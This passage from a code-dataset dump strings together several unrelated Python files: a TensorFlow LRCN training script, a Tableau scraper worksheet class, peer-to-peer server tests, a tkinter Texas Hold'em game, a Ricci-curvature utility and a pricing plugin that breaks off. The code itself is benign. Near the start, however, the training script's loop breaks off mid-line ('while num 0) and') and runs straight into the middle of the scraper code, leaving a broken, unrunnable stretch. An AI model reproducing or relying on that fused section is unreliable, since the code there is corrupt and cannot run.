    for time_step in range(n_steps):\n        out_uni = tf.matmul(outputs[time_step], weights['out']) + biases['out']\n        out_uni_drop = tf.nn.dropout(out_uni, keep_prob7)\n        out.append(out_uni_drop)\n\n    out = tf.transpose(out, [1, 0, 2])\n    return out\n\n\ndef loss(pred, labels_placeholder):\n    #error = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\n    error = tf.reduce_mean(tf.square(pred-labels_placeholder))\n\n    return error\n\n\n# Open the dataset file\nf = open(FLAGS.dataset, 'r')\n# Arrays that will hold the data\ndataset_image = []\ndataset_label = []\nprint(\"...loading dataset\")\nfor line in f:\n    # Strip the trailing newline and split on whitespace\n    line = line.rstrip()\n    l = line.split()\n    # Load the image\n    img = cv2.imread(l[0])\n    # Crop to a square\n    img = img[:,400-240:400+240]\n    img = cv2.resize(img, (n_input_row, n_input_col))\n    # Flatten, then scale to floats in [0, 1]\n    dataset_image.append(img.flatten().astype(np.float32)/255.0)\n\n    x = float(l[1])\n    y = float(l[3])\n    z = float(l[2])\n    angle = float(l[4])\n    pitch = float(l[5])\n\n    # 2 classes: estimate the position only\n    tmp = np.zeros(n_classes)\n    tmp[0] = x\n    tmp[1] = y\n    dataset_label.append(tmp)\n    #sys.exit()\n\nf.close()\n\ndataset_image = np.asarray(dataset_image)\ndataset_label = np.asarray(dataset_label)\n\n#print (len(dataset_image))\n#print (len(dataset_label))\nDATA_SIZE = len(dataset_image)\n\nif DATA_SIZE%n_steps!=0:\n    print (\"MY_ERROR : DATA_SIZE_SEQ\")\n    sys.exit()\n\nDATA_SIZE_SEQ = int(DATA_SIZE/n_steps)\n#print (DATA_SIZE_SEQ)#1200\n#print (len(dataset_image))#12000\n#print (len(dataset_image[0]))#6912\n#sys.exit()\n\ndataset_image = dataset_image.reshape((DATA_SIZE_SEQ,n_steps,n_input_row*n_input_col*3))\n#print (len(dataset_image))#1200\n#print (len(dataset_image[0]))#10\n#print (len(dataset_image[0][0]))#48*48*3\n\ndataset_label = dataset_label.reshape((DATA_SIZE_SEQ,n_steps,n_classes))\n#print (len(dataset_label))#1200\n#print (len(dataset_label[0]))#10\n#print (len(dataset_label[0][0]))#2\n\ndataset_image = np.asarray(dataset_image)\ndataset_label = np.asarray(dataset_label)\n\nkeep_prob1 = tf.placeholder(\"float\")\nkeep_prob2 = tf.placeholder(\"float\")\nkeep_prob3 = tf.placeholder(\"float\")\nkeep_prob4 = tf.placeholder(\"float\")\nkeep_prob5 = tf.placeholder(\"float\")\nkeep_prob6 = tf.placeholder(\"float\")\nkeep_prob7 = tf.placeholder(\"float\")\n\npred = LRCN(images_placeholder, weights, biases, keep_prob1, keep_prob2, keep_prob3, keep_prob4, keep_prob5, keep_prob6, keep_prob7)\n\n#sys.exit()\n\n# Define loss and optimizer\n#cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\ncost = loss(pred, labels_placeholder)\n#cost = tf.reduce_mean(tf.square(pred-y))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Evaluate model\n#correct_pred = tf.equal(tf.argmax(pred,2), tf.argmax(y,2))\n#accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n# Initializing the variables\n#init = tf.initialize_all_variables()\n\n# Prepare the checkpoint saver\nsaver = tf.train.Saver(max_to_keep = 0)\n\n#sys.exit()\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\n# Launch the graph\nwith tf.Session(config=config) as sess:\n\n    num = 0\n    while num 0) and\n                (\"commandReturn\" in cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0]) and\n                (\"underlyingDataTable\" in cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0][\"commandReturn\"]) and\n                (\"dataDictionary\" in cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0][\"commandReturn\"][\"underlyingDataTable\"]) and\n                (\"dataSegments\" in 
cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0][\"commandReturn\"][\"underlyingDataTable\"][\"dataDictionary\"])):\n dataSegments = cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][\n 0][\"commandReturn\"][\"underlyingDataTable\"][\"dataDictionary\"][\"dataSegments\"]\n dataSegmentscp = copy.deepcopy(dataSegments)\n keys = list(dataSegmentscp.keys())\n for key in keys:\n if dataSegmentscp[key] is not None:\n self._scraper.dataSegments[key] = dataSegmentscp[key]\n else:\n self._scraper.logger.warning(\n f\"no data dictionary present in response\")\n\n def getColumns(self) -> List[str]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n return [\n t[\"fieldCaption\"]\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(\n presModel, self.name, noSelectFilter=True\n )\n ]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n return [\n t[\"fieldCaption\"]\n for t in tableauscraper.utils.getIndicesInfo(\n presModel, self.name, noSelectFilter=True\n )\n ]\n\n def getFilters(self) -> List[str]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n else:\n presModel = tableauscraper.utils.getPresModelVizInfo(\n self._originalInfo)\n return tableauscraper.utils.listFilters(presModel, self.name)\n\n def setFilter(self, columnName, value):\n try:\n filter = [\n {\n \"globalFieldName\": t[\"globalFieldName\"],\n \"index\": t[\"values\"].index(value) + t[\"ordinal\"]\n }\n for t in self.getFilters()\n if t[\"column\"] == columnName\n ]\n if len(filter) == 0:\n self._scraper.logger.error(f\"column {columnName} not found\")\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n r = tableauscraper.api.filter(\n self._scraper, self.name, filter[0][\"globalFieldName\"], [filter[0][\"index\"]])\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetsCmdResponse(self._scraper, r)\n except ValueError as e:\n self._scraper.logger.error(str(e))\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n except tableauscraper.api.APIResponseException as e:\n self._scraper.logger.error(str(e))\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n\n def getSelectableItems(self) -> List[str]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n return [\n {\n \"column\": t[\"fieldCaption\"],\n \"values\": next(iter([y for y in tableauscraper.utils.getData(self._data_dictionnary, [t]).values()]), [])\n }\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(presModel, self.name, noSelectFilter=True)\n ]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n if presModel is None:\n presModel = tableauscraper.utils.getPresModelVizInfo(\n self._originalInfo)\n indicesInfo = tableauscraper.utils.getIndicesInfoStoryPoint(\n presModel, self.name, noSelectFilter=True)\n else:\n indicesInfo = tableauscraper.utils.getIndicesInfo(\n presModel, self.name, noSelectFilter=True)\n return [\n {\n \"column\": t[\"fieldCaption\"],\n \"values\": next(iter([\n y\n for y in tableauscraper.utils.getData(self._data_dictionnary, [t]).values()\n ]), [])\n }\n for t in indicesInfo\n ]\n\n def getSelectableValues(self, column) -> List[str]:\n if self.cmdResponse:\n 
presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n columnObj = [\n t\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(\n presModel, self.name, noSelectFilter=True\n )\n if t[\"fieldCaption\"] == column\n ]\n if len(columnObj) == 0:\n return []\n frameData = tableauscraper.utils.getData(\n self._data_dictionnary, [columnObj[0]]\n )\n frameDataKeys = list(frameData.keys())\n\n if len(frameDataKeys) == 0:\n return []\n return frameData[frameDataKeys[0]]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n if presModel is None:\n presModel = tableauscraper.utils.getPresModelVizInfo(\n self._originalInfo)\n indicesInfo = tableauscraper.utils.getIndicesInfoStoryPoint(\n presModel, self.name, noSelectFilter=True)\n else:\n indicesInfo = tableauscraper.utils.getIndicesInfo(\n presModel, self.name, noSelectFilter=True)\n\n columnObj = [\n t\n for t in indicesInfo\n if t[\"fieldCaption\"] == column\n ]\n if len(columnObj) == 0:\n return []\n frameData = tableauscraper.utils.getData(\n self._data_dictionnary, [columnObj[0]]\n )\n frameDataKeys = list(frameData.keys())\n\n if len(frameDataKeys) == 0:\n return []\n return frameData[frameDataKeys[0]]\n\n def getTupleIds(self) -> List[int]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n columnObj = [\n t\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(\n presModel, self.name, noSelectFilter=True, noFieldCaption=True\n )\n if t[\"fn\"] == \"[system:visual].[tuple_id]\"\n ]\n if len(columnObj) == 0:\n return []\n\n return [t[\"tupleIds\"] for t in columnObj]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n columnObj = [\n t\n for t in tableauscraper.utils.getIndicesInfo(\n presModel, self.name, noSelectFilter=True, noFieldCaption=True\n )\n if t[\"fn\"] == \"[system:visual].[tuple_id]\"\n ]\n if len(columnObj) == 0:\n return []\n return [t[\"tupleIds\"] for t in columnObj]\n\n def select(self, column, value):\n values = self.getSelectableValues(column)\n tupleItems = self.getTupleIds()\n try:\n\n indexedByTuple = False\n for tupleItem in tupleItems:\n if len(tupleItem) >= len(values):\n index = values.index(value)\n index = tupleItem[index]\n indexedByTuple = True\n break\n if not indexedByTuple:\n index = values.index(value)\n index = index + 1\n r = tableauscraper.api.select(self._scraper, self.name, [index])\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetsCmdResponse(self._scraper, r)\n except ValueError as e:\n self._scraper.logger.error(str(e))\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n\n def getDownloadableSummaryData(self, numRows=200):\n r = tableauscraper.api.getDownloadableSummaryData(\n self._scraper, self.name, self._scraper.dashboard, numRows)\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetDownloadCmdResponse(self._scraper, r)\n\n def getDownloadableUnderlyingData(self, numRows=200):\n r = tableauscraper.api.getDownloadableUnderlyingData(\n self._scraper, self.name, self._scraper.dashboard, numRows)\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetDownloadCmdResponse(self._scraper, r)\n\n def levelDrill(self, drillDown, position=0):\n r = tableauscraper.api.levelDrill(\n self._scraper, self.name, drillDown, position)\n self.updateFullData(r)\n return 
tableauscraper.dashboard.getWorksheetsCmdResponse(self._scraper, r)\n","sub_path":"tableauscraper/TableauWorksheet.py","file_name":"TableauWorksheet.py","file_ext":"py","file_size_in_byte":11468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"256150435","text":"import unittest\nimport sys\nimport time\nimport random\n\nfrom PyQt4 import QtCore, QtGui\n\nfrom dp.src.utils.log import Log\nfrom dp.src.utils.utils import Utils\nfrom dp.src.rpc.peer import Peer\nfrom dp.src.ui.stroke import Stroke\nfrom dp.src.rpc.clerk import Clerk\nfrom dp.src.session.central import CentralServer\n\nfrom .test_common import GenericTestCase\n\nimport xmlrpclib\n\nclass CentralServerTest(GenericTestCase):\n    def setUp(self):\n        \"\"\" Prepares a simple situation with two test servers \"\"\"\n        self.servers = []\n        self.peers = []\n        self.ips = []\n        self.ports = []\n        self.ids = []\n        self.clerks = []\n        self.logs = []\n\n        self.cs_proxies = []\n\n\n        app = QtGui.QApplication(sys.argv)\n\n        # setup central server\n        lc = Log(100)\n        while True:\n            try:\n                port = random.randint(1, 8000)\n                self.csport = port\n                self.cs = CentralServer('localhost', port, lc)\n                break\n            except:\n                continue\n\n    def addSite(self):\n        log = Log(len(self.peers))\n        self.logs.append(log)\n        self.cs_proxies.append(xmlrpclib.Server('http://%s:%s' % ('localhost', self.csport)))\n        ip = 'localhost'\n        while True:\n            try:\n                port = random.randint(1, 8000)\n                log.Print('got that port')\n                peer = Peer(ip, port, build_ui = False, log=log)\n                log.Print('got that peer')\n                self.peers.append(peer)\n                self.ports.append(port)\n                self.ips.append(ip)\n                self.clerks.append(Clerk(peer.state))\n                break\n            except:\n                continue\n        self.clerks[-1].state.cs = self.cs_proxies[-1]\n\n    def addMultipleSites(self, n=1):\n        \"\"\" Adds n test servers \"\"\"\n        for i in range(n):\n            self.addSite()\n\n    def test_basic_central(self):\n        \"\"\" Central - Basic server\"\"\"\n        self.addMultipleSites(5)\n        ck = self.clerks\n\n        sess_num = ck[0].start()\n        time.sleep(1)\n\n        for i in range(1, 4):\n            ck[i].join(sess_num)\n        time.sleep(1)\n        ck[3].lock()\n        for i in range(4, 5):\n            ck[i].join(sess_num)\n\n        for i, c in enumerate(self.clerks):\n            self.logs[i].blue(c.state.peers)\n            self.logs[i].blue(c.state.id)\n\n        s = self.genRandomStrokes(3)\n\n        ck[0].addStroke(s[0])\n        ck[1].addStroke(s[1])\n        time.sleep(5)\n\n        self.assertStrokesEqual(self.peers[0:3])\n        # NOTE : adapt assert to query members from central server\n\n    def test_hard_central(self):\n        \"\"\" Central - hard requests\"\"\"\n        self.addMultipleSites(12)\n        ck = self.clerks\n\n        sess_num = ck[0].start()\n        time.sleep(1)\n\n        n_joined = 1\n        for i in range(1, len(ck)//2):\n            success = ck[i].join(sess_num)\n            if success:\n                n_joined += 1\n            if random.randint(0, 1) == 1:\n                # check duplicate requests\n                success = ck[i].join(sess_num)\n\n        for i in range(len(ck)//2, len(ck)):\n            success = ck[i].join(sess_num)\n            if success:\n                n_joined += 1\n            if random.randint(0, 1) == 1:\n                # check duplicate requests\n                ck[i].lock()\n\n        time.sleep(1)\n        self.assertEqual(n_joined, len(self.cs.responder.hosts[sess_num]))\n","sub_path":"test/test_central.py","file_name":"test_central.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"149610971","text":"import Task\n\nclass Help(Task.Task):\n    def __init__(self, dic, longer):\n        self.dic = dic\n        self.longer = longer\n        return super(Help, self).__init__()\n    def help(self, pre: str, mult: int):\n
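        # the catch-all help flags print this description one level deeper\n        print(pre*mult +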
\"show this help page\")\n def run(self, params):\n print(\"TOOL HELP PAGE\")\n pre = \"\\t\"\n mult = 1\n print(pre*mult + \"-h --help --crocodile --anything-unused\")\n self.help(pre, mult+1)\n for x in self.longer:\n print(pre*mult + self.longer[x] + \" \" + x)\n self.dic[self.longer[x]].help(pre, mult+1)","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600947522","text":"from tkinter import *\r\nfrom tkinter import font\r\nfrom winsound import *\r\nfrom Card import *\r\nfrom Player import *\r\nimport random\r\nclass TexasHoldemPoker:\r\n def __init__(self):\r\n self.window = Tk()\r\n self.window.title(\"Texas Holdem Poker\")\r\n self.window.geometry(\"800x600\")\r\n self.window.configure(bg=\"green\")\r\n self.fontstyle = font.Font(self.window, size=24, weight='bold', family='Consolas')\r\n self.fontstyle2 = font.Font(self.window, size=16, weight='bold', family='Consolas')\r\n self.cardDeck = [i for i in range(52)]\r\n random.shuffle(self.cardDeck)\r\n self.player = Player(\"player\")\r\n self.dealer = Player(\"dealer\")\r\n self.betMoney = 10\r\n self.playerMoney = 1000\r\n self.LcardsPlayer = []\r\n self.LcardsDealer = []\r\n self.LfieldCard = []\r\n self.fieldCard = []\r\n self.deckN = 0\r\n self.turn = 0\r\n self.jokbo = {\"로티플\":0, \"백스플\":1, \"스티플\":2, \"포카드\":3, \\\r\n \"풀하우스\":4, \"플러쉬\":5, \"마운틴\":6, \"백스트\":7, \\\r\n \"스트레이트\":8, \"트리플\":9, \"투페어\":10, \"원페어\":11, \\\r\n \"노페어\":12}\r\n self.setupLabel()\r\n self.setupButton()\r\n self.window.mainloop()\r\n def setupButton(self):\r\n self.BCheck = Button(self.window, text=\"check\", width=6, height=1, font=self.fontstyle2, \\\r\n command=lambda X=0: self.pressedB(X))\r\n self.BCheck.place(x=50, y=500)\r\n self.BOne = Button(self.window, text=\"Bet x1\", width=6, height=1, font=self.fontstyle2, \\\r\n command=lambda X=1: self.pressedB(X))\r\n self.BOne.place(x=150, y=500)\r\n self.BDouble = Button(self.window, text=\"Bet x2\", width=6, height=1, font=self.fontstyle2, \\\r\n command=lambda X=2: self.pressedB(X))\r\n self.BDouble.place(x=250, y=500)\r\n self.Deal = Button(self.window, text=\"Deal\", width=6, height=1, font=self.fontstyle2, command=self.pressedDeal)\r\n self.Deal.place(x=600, y=500)\r\n self.Again = Button(self.window, text=\"Again\", width=6, height=1, font=self.fontstyle2,\r\n command=self.pressedAgain)\r\n self.Again.place(x=700, y=500)\r\n self.Deal['state'] = 'disabled'\r\n self.Deal['bg'] = 'gray'\r\n self.Again['state'] = 'disabled'\r\n self.Again['bg'] = 'gray'\r\n def setupLabel(self):\r\n self.LbetMoney = Label(text=\"$10\", width=4, height=1, font=self.fontstyle, bg=\"green\", fg=\"yellow\")\r\n self.LbetMoney.place(x=200, y=450)\r\n self.LplayerMoney = Label(text=\"You have $\"+str(self.playerMoney-self.betMoney), width=15, height=1, \\\r\n font=self.fontstyle, bg=\"green\", fg=\"yellow\")\r\n self.LplayerMoney.place(x=500, y=450)\r\n self.LplayerStatus = Label(text=\"\", width=10, height=1, font=self.fontstyle2, bg=\"green\", fg=\"cyan\")\r\n self.LplayerStatus.place(x=400, y=400)\r\n self.LdealerStatus = Label(text=\"\", width=10, height=1, font=self.fontstyle2, bg=\"green\", fg=\"cyan\")\r\n self.LdealerStatus.place(x=400, y=100)\r\n self.Lstatus = Label(text=\"\", width=15, height=1, font=self.fontstyle, bg=\"green\", fg=\"red\")\r\n self.Lstatus.place(x=500, y=300)\r\n def pressedB(self, X):\r\n if self.betMoney + self.betMoney * X-self.betMoney <= 
self.playerMoney-self.betMoney:\r\n self.betMoney += self.betMoney * X\r\n self.LbetMoney.configure(text=\"$\" + str(self.betMoney))\r\n self.LplayerMoney.configure(text=\"You have $\" + str(self.playerMoney-self.betMoney))\r\n if self.turn != 4:\r\n self.Deal[\"state\"] = \"active\"\r\n self.Deal[\"bg\"] = \"white\"\r\n PlaySound('sounds/chip.wav', SND_FILENAME)\r\n else: PlaySound('sounds/wrong.wav', SND_FILENAME)\r\n self.BCheck[\"state\"] = \"disabled\"\r\n self.BCheck[\"bg\"] = \"gray\"\r\n self.BOne[\"state\"] = \"disabled\"\r\n self.BOne[\"bg\"] = \"gray\"\r\n self.BDouble[\"state\"] = \"disabled\"\r\n self.BDouble[\"bg\"] = \"gray\"\r\n if self.turn == 4: self.showResult()\r\n def straight(self, tmp, p):\r\n for i in range(13, 4, -1):\r\n if tmp[i] and tmp[i-1] and tmp[i-2] and tmp[i-3] and tmp[i-4]:\r\n if i - 4 != 1: p.setAdd(str(i))\r\n else: p.setAdd(str(1))\r\n return True\r\n return False\r\n def calcStatus(self, p):\r\n myStatus = \"\"\r\n tmp = []\r\n for c in self.fieldCard: tmp.append(c)\r\n tmp += p.getCards()\r\n suitTMP = [0 for _ in range(4)]\r\n valTMP = [0 for _ in range(14)] #because of index\r\n for c in tmp:\r\n suitTMP[c.getX()] += 1\r\n valTMP[c.getValue()] += 1\r\n for i in range(len(suitTMP)):\r\n if suitTMP[i] >= 5:\r\n myStatus = \"플러쉬\"\r\n n = 0\r\n for c in tmp:\r\n if c.getX() == i:\r\n if c.getValue() > n or c.getValue() == 1:\r\n if c.getValue() == 1:\r\n n = 1\r\n break\r\n n = c.getValue()\r\n p.setAdd(str(n))\r\n if valTMP[10] and valTMP[11] and valTMP[12] and valTMP[13] and valTMP[1]:\r\n p.setAdd(str(1))\r\n return \"로티플\"\r\n elif valTMP[1] and valTMP[2] and valTMP[3] and valTMP[4] and valTMP[5]:\r\n p.setAdd(str(1))\r\n return \"백스플\"\r\n elif self.straight(valTMP, p): return \"스티플\"\r\n triple, d1, d2 = False, False, False\r\n a, b, c = 0, 0, 0\r\n for i in range(len(valTMP)):\r\n if valTMP[i] >= 4:\r\n p.setAdd(str(i))\r\n return \"포카드\"\r\n elif valTMP[i] >= 3:\r\n a = i\r\n triple = True\r\n elif valTMP[i] >= 2 and d1 == False:\r\n b = i\r\n d1 = True\r\n elif valTMP[i] >= 2:\r\n c = i\r\n d2 = True\r\n if triple and (d1 or d2):\r\n if 1 in (a, b, c): p.setAdd(str(1))\r\n else: p.setAdd(str(max(a, b, c)))\r\n return \"풀하우스\"\r\n if myStatus != \"\": return myStatus\r\n p.setAdd(str(1))\r\n if valTMP[10] and valTMP[11] and valTMP[12] and valTMP[13] and valTMP[1]: return \"마운틴\"\r\n if valTMP[1] and valTMP[2] and valTMP[3] and valTMP[4] and valTMP[5]: return \"백스트\"\r\n if self.straight(valTMP, p): return \"스트레이트\"\r\n if triple:\r\n p.setAdd(str(a))\r\n return \"트리플\"\r\n if 1 in (b, c): p.setAdd(str(1))\r\n else: p.setAdd(str(max(b, c)))\r\n if d1 and d2: return \"투페어\"\r\n if d1 or d2: return \"원페어\"\r\n n = 0\r\n if valTMP[1] > 0:\r\n p.setAdd(str(1))\r\n return \"노페어\"\r\n else:\r\n for i in range(2, len(valTMP)):\r\n if valTMP[i] > 0 and i > n: n = i\r\n p.setAdd(str(n))\r\n return \"노페어\"\r\n def win(self):\r\n self.Lstatus.configure(text=\"You won!!\")\r\n PlaySound('sounds/win.wav', SND_FILENAME)\r\n self.playerMoney += self.betMoney\r\n def lose(self):\r\n self.Lstatus.configure(text=\"Sorry you lost!\")\r\n PlaySound('sounds/wrong.wav', SND_FILENAME)\r\n self.playerMoney -= self.betMoney\r\n def draw(self):\r\n self.Lstatus.configure(text=\"Push\")\r\n self.playerMoney = self.playerMoney\r\n def showResult(self):\r\n for i in range(2):\r\n p = PhotoImage(file=\"cards/\" + self.dealer.cards[i].filename())\r\n self.LcardsDealer[i].configure(image=p)\r\n self.LcardsDealer[i].image = p\r\n playerStatus = 
self.calcStatus(self.player)\r\n dealerStatus = self.calcStatus(self.dealer)\r\n self.LdealerStatus.configure(text=dealerStatus+self.dealer.getAdd())\r\n self.LplayerStatus.configure(text=playerStatus+self.player.getAdd())\r\n if self.jokbo.get(playerStatus) < self.jokbo.get(dealerStatus): self.win()\r\n elif self.jokbo.get(playerStatus) > self.jokbo.get(dealerStatus): self.lose()\r\n else:\r\n if int(self.player.getAdd()) == 1:\r\n if int(self.dealer.getAdd()) == 1: self.draw()\r\n else: self.win()\r\n else:\r\n if int(self.dealer.getAdd()) == 1: self.lose()\r\n else:\r\n if int(self.player.getAdd()) > int(self.dealer.getAdd()): self.win()\r\n elif int(self.player.getAdd()) < int(self.dealer.getAdd()): self.lose()\r\n else: self.draw()\r\n self.betMoney = 0\r\n self.LbetMoney.configure(text=\"$\" + str(self.betMoney))\r\n self.LplayerMoney.configure(text=\"You have $\" + str(self.playerMoney-self.betMoney))\r\n self.Again['state'] = 'active'\r\n self.Again['bg'] = 'white'\r\n def pressedDeal(self):\r\n self.BCheck[\"state\"] = \"active\"\r\n self.BCheck[\"bg\"] = \"white\"\r\n self.BOne[\"state\"] = \"active\"\r\n self.BOne[\"bg\"] = \"white\"\r\n self.BDouble[\"state\"] = \"active\"\r\n self.BDouble[\"bg\"] = \"white\"\r\n self.Deal[\"state\"] = \"disabled\"\r\n self.Deal[\"bg\"] = \"gray\"\r\n if self.turn == 0:\r\n self.hitPlayer(self.player.inHand())\r\n self.hitDealerDown(self.dealer.inHand())\r\n self.hitPlayer(self.player.inHand())\r\n self.hitDealerDown(self.dealer.inHand())\r\n elif self.turn == 1:\r\n for i in range(3): self.setFieldCard()\r\n elif self.turn == 2: self.setFieldCard()\r\n elif self.turn == 3: self.setFieldCard()\r\n self.turn += 1\r\n def hitPlayer(self, n):\r\n newCard = Card(self.cardDeck[self.deckN])\r\n self.deckN += 1\r\n self.player.addCard(newCard)\r\n p = PhotoImage(file=\"cards/\" + newCard.filename())\r\n self.LcardsPlayer.append(Label(self.window, image=p))\r\n self.LcardsPlayer[self.player.inHand() - 1].image = p\r\n self.LcardsPlayer[self.player.inHand() - 1].place(x=50 + n * 80, y=350)\r\n PlaySound('sounds/cardFlip1.wav', SND_FILENAME)\r\n def hitDealerDown(self, n):\r\n newCard = Card(self.cardDeck[self.deckN])\r\n self.deckN += 1\r\n self.dealer.addCard(newCard)\r\n p = PhotoImage(file=\"cards/b2fv.png\")\r\n self.LcardsDealer.append(Label(self.window, image=p))\r\n self.LcardsDealer[self.dealer.inHand() - 1].image = p\r\n self.LcardsDealer[self.dealer.inHand() - 1].place(x=50 + n * 80, y=50)\r\n PlaySound('sounds/cardFlip1.wav', SND_FILENAME)\r\n def setFieldCard(self):\r\n newCard = Card(self.cardDeck[self.deckN])\r\n self.deckN += 1\r\n n = self.deckN-4\r\n self.fieldCard.append(newCard)\r\n p = PhotoImage(file=\"cards/\" + newCard.filename())\r\n self.LfieldCard.append(Label(self.window, image=p))\r\n self.LfieldCard[n - 1].image = p\r\n self.LfieldCard[n - 1].place(x=130 + n * 80, y=200)\r\n PlaySound('sounds/cardFlip1.wav', SND_FILENAME)\r\n def pressedAgain(self):\r\n PlaySound('sounds/ding.wav', SND_FILENAME)\r\n self.player.reset()\r\n self.dealer.reset()\r\n self.fieldCard.clear()\r\n self.Again['state'] = 'disabled'\r\n self.Again['bg'] = 'gray'\r\n self.BCheck['state'] = 'active'\r\n self.BCheck['bg'] = 'white'\r\n self.BOne['state'] = 'active'\r\n self.BOne['bg'] = 'white'\r\n self.BDouble['state'] = 'active'\r\n self.BDouble['bg'] = 'white'\r\n for l in self.LcardsPlayer: l.destroy()\r\n for l in self.LcardsDealer: l.destroy()\r\n for l in self.LfieldCard: l.destroy()\r\n self.LcardsPlayer = []\r\n self.LcardsDealer = []\r\n 
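# fresh label lists so the next hand renders on a clean board\r\n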
self.LfieldCard = []\r\n self.LplayerStatus[\"text\"] = \"\"\r\n self.LdealerStatus[\"text\"] = \"\"\r\n self.Lstatus[\"text\"] = \"\"\r\n self.turn = 0\r\n self.deckN = 0\r\n self.betMoney = 10\r\n self.cardDeck = [i for i in range(52)]\r\n random.shuffle(self.cardDeck)\r\n self.LbetMoney.configure(text=\"$\" + str(self.betMoney))\r\n self.LplayerMoney.configure(text=\"You have $\" + str(self.playerMoney - self.betMoney))\r\nTexasHoldemPoker()\r\n","sub_path":"TexasHoldemPoker.py","file_name":"TexasHoldemPoker.py","file_ext":"py","file_size_in_byte":12465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"608408875","text":"import networkx as nx\r\nimport numpy as np\r\nimport math\r\nimport sys\r\nfrom GraphRicciCurvature.OllivierRicci import OllivierRicci\r\nimport os\r\nimport pickle as pkl\r\n\r\ndef compute_ricci(args, data_path):\r\n G = load_graph(args.dataset, args.use_feats, data_path)\r\n orc = OllivierRicci(G, alpha=0.5, verbose=\"INFO\")\r\n orc.compute_ricci_curvature()\r\n G_orc = orc.G.copy()\r\n summary_stats(G_orc)\r\n\r\ndef summary_stats(G):\r\n print(\"Sanity check of first 5 edges:\")\r\n for n1,n2 in list(G.edges())[:5]:\r\n print(\"Ollivier-Ricci curvature of edge (%s,%s) is %f\" % (n1, n2, G[n1][n2][\"ricciCurvature\"]))\r\n ricci_curvatures = nx.get_edge_attributes(G, \"ricciCurvature\").values()\r\n print(\"Mean Ricci Curvatures: {}\".format(np.mean(list(ricci_curvatures))))\r\n\r\ndef load_graph(dataset_str, use_feats, data_path):\r\n if dataset_str in ['cora', 'pubmed']:\r\n with open(os.path.join(data_path, \"ind.{}.graph\".format(dataset_str)), 'rb') as f:\r\n if sys.version_info > (3, 0):\r\n graph = pkl.load(f, encoding='latin1')\r\n else:\r\n graph = pkl.load(f)\r\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\r\n G = nx.from_numpy_matrix(adj)\r\n elif dataset_str == 'disease_lp':\r\n pass\r\n else:\r\n raise FileNotFoundError('Dataset {} is not supported.'.format(dataset_str))\r\n return G\r\n","sub_path":"utils/ricci_utils.py","file_name":"ricci_utils.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154182305","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom ralph.util import plugin, api_pricing\nfrom ralph_pricing.models import UsageType, DailyUsage, Device, DailyDevice\n\nlogger = logging.getLogger(__name__)\n\n\ndef update_usage(device, venture, date, value, usage_type):\n usage, created = DailyUsage.objects.get_or_create(\n date=date,\n type=usage_type,\n pricing_device=device,\n )\n usage.pricing_venture = venture\n usage.value = value\n usage.save()\n\n\ndef update(data, date, usage_type):\n try:\n device = Device.objects.get(\n device_id=data['device_id'],\n )\n except Device.DoesNotExist:\n logger.warning(\n 'Device {} not found in Scrooge'.format(data['device_id'])\n )\n return False\n\n venture = None\n try:\n daily_device = device.dailydevice_set.get(date=date)\n venture = daily_device.pricing_venture\n except DailyDevice.DoesNotExist:\n logger.warning('DailyDevice for id {} and date {} not found'.format(\n data['device_id'],\n date,\n ))\n return False\n if venture is None:\n logger.error(\n 'Venture not specified for DailyDevice {} and date {}'.format(\n data['device_id'],\n date,\n )\n )\n return False\n update_usage(device, 
